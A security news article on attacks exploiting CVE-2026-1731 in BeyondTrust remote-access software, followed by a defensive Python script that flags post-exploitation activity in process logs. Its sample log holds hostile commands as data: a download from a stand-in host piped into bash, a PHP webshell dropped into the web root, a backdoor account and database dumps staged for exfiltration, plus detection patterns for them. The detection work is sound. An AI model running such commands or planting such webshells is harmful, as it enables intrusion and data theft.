Attackers deploying the VShell and SparkRAT backdoors have been observed exploiting CVE-2026-1731, a pre-authentication remote code execution flaw in the thin-scc-wrapper component of unpatched BeyondTrust Remote Support and Privileged Remote Access software. BeyondTrust published a security advisory on 6 February 2026, and the U.S. Cybersecurity and Infrastructure Security Agency (CISA) added CVE-2026-1731 to its Known Exploited Vulnerabilities (KEV) catalog on 13 February 2026, prompting urgent remediation by both public-sector and private-sector organisations.
Unit 42, Palo Alto Networks' threat intelligence team, reports post-exploitation activity consistent with network reconnaissance, account creation, webshell deployment, command-and-control (C2) traffic, deployment of backdoors and remote management tools, lateral movement and data theft, with attacks observed across sectors in the US, France, Germany, Australia and Canada.
From its telemetry, Palo Alto Networks counted more than 10,600 internet-exposed instances vulnerable to CVE-2026-1731, reinforcing the need for rapid patching; the company also notes that its Cortex XDR, Xpanse and related cloud-delivered services provide additional protective coverage, which complements but does not replace the patch. The campaign uses the SparkRAT and VShell malware families, delivered via PowerShell and Bash, and the attackers attempted to exfiltrate data from configuration files, internal databases and PostgreSQL dumps.
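The post-exploitation activity described above (reconnaissance, account creation, webshell deployment, shell-based payload delivery, database dumps and staging for exfiltration) is what defenders should hunt for on a self-hosted appliance while patching is under way. The following triage script is an added example and is not Unit 42's or BeyondTrust's code: the process-log format, the web service account name (`www-data`), the paths and the regexes are assumptions, and the log lines are constructed for illustration; only the activity categories come from the campaign reporting.

```python
"""Triage post-exploitation indicators from process-execution logs.

Added example, not Unit 42's or BeyondTrust's code. The log format, the
service account name (www-data), the paths and the regexes are assumptions;
the activity categories are the ones the campaign reporting describes.
"""
import re
from dataclasses import dataclass

# Assumed line format: "<ts> <host> user=<u> cwd=<d> cmd=<command line>"
LINE_RE = re.compile(
    r"^(?P<ts>\S+)\s+(?P<host>\S+)\s+user=(?P<user>\S+)\s+cwd=(?P<cwd>\S+)\s+cmd=(?P<cmd>.*)$"
)

# Constructed sample log (not real telemetry): one benign line at the end.
SAMPLE_LOG = """\
2026-02-10T03:14:07Z appliance01 user=www-data cwd=/ cmd=id
2026-02-10T03:14:09Z appliance01 user=www-data cwd=/ cmd=ip addr
2026-02-10T03:14:31Z appliance01 user=root cwd=/ cmd=useradd -m -s /bin/bash support_svc
2026-02-10T03:15:02Z appliance01 user=www-data cwd=/ cmd=bash -c "curl -s http://203.0.113.7/s.sh | bash"
2026-02-10T03:15:40Z appliance01 user=www-data cwd=/var/www/html cmd=sh -c "echo '<?php eval($_POST[c]); ?>' > /var/www/html/img/cache.php"
2026-02-10T03:17:12Z appliance01 user=root cwd=/tmp cmd=pg_dump -U postgres appliance_db -f /tmp/.d.sql
2026-02-10T03:18:00Z appliance01 user=root cwd=/tmp cmd=tar czf /tmp/.d.tgz /tmp/.d.sql /etc/bt/config.xml
2026-02-10T09:00:00Z appliance01 user=root cwd=/ cmd=logrotate /etc/logrotate.conf
"""

# (rule name, severity, pattern applied to the command string). Heuristic,
# tuned to be disjoint on the sample; a real deployment would tune to its baseline.
RULES = [
    ("recon", "low",
     re.compile(r"^(?:id|whoami|hostname|uname|ip addr|netstat|ss)\b")),
    ("account_creation", "high",
     re.compile(r"\b(?:useradd|adduser)\b|\bnet\s+user\b.*\s/add\b", re.I)),
    ("shell_delivery", "high",  # download piped straight into a shell, or encoded PowerShell
     re.compile(r"\b(?:curl|wget)\b[^|]*\|\s*(?:ba)?sh\b|powershell\b.*\s-(?:e|enc|encodedcommand)\b", re.I)),
    ("webshell_drop", "critical",  # eval of request data, or a script written into the web root
     re.compile(r"eval\(\$_(?:POST|GET|REQUEST)|>\s*/var/www/\S+\.(?:php|jsp|aspx?)\b")),
    ("db_dump", "high",
     re.compile(r"\bpg_dump(?:all)?\b|\bmysqldump\b")),
    ("staging", "medium",  # archiving config files or SQL dumps ahead of exfiltration
     re.compile(r"\b(?:tar|zip|7z)\b.*(?:config|\.sql|dump)")),
]

PRECURSORS = {"account_creation", "shell_delivery", "webshell_drop"}
EXFIL_PREP = {"db_dump", "staging"}


@dataclass
class Finding:
    ts: str
    user: str
    rule: str
    severity: str
    cmd: str


def triage(log_text: str) -> list[Finding]:
    """Return one Finding per (line, matching rule), in log order."""
    findings = []
    for raw in log_text.splitlines():
        m = LINE_RE.match(raw)
        if not m:
            continue  # unparsable line: skip rather than guess
        for rule, severity, pat in RULES:
            if pat.search(m["cmd"]):
                findings.append(Finding(m["ts"], m["user"], rule, severity, m["cmd"]))
    return findings


def chain_detected(findings: list[Finding]) -> bool:
    """True when an access precursor precedes a dump/staging step (ISO timestamps sort lexically)."""
    first_precursor = min((f.ts for f in findings if f.rule in PRECURSORS), default=None)
    last_exfil = max((f.ts for f in findings if f.rule in EXFIL_PREP), default=None)
    return first_precursor is not None and last_exfil is not None and first_precursor < last_exfil


if __name__ == "__main__":
    hits = triage(SAMPLE_LOG)
    for f in hits:
        print(f"{f.ts} {f.severity:8} {f.rule:17} user={f.user} :: {f.cmd}")
    print("exploit-to-exfil chain:", chain_detected(hits))
```

The chain check is deliberately coarse: a single `pg_dump` by root may be a scheduled backup, so the script only escalates when an account creation, webshell drop or piped-download precedes it. Feed it the appliance's process audit log (auditd, EDR process telemetry or equivalent) rather than the sample.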
For organisations running self-hosted BeyondTrust appliances, the advisory recommends manually patching any instance that does not receive automatic updates, following the specific upgrade paths for Remote Support and Privileged Remote Access set out in the advisory. BeyondTrust rates this a high-risk, actively exploited vulnerability, which underscores the value of defence in depth and of keeping administrative interfaces off the public internet and restricted to trusted networks, so that the impact is limited should new variants emerge.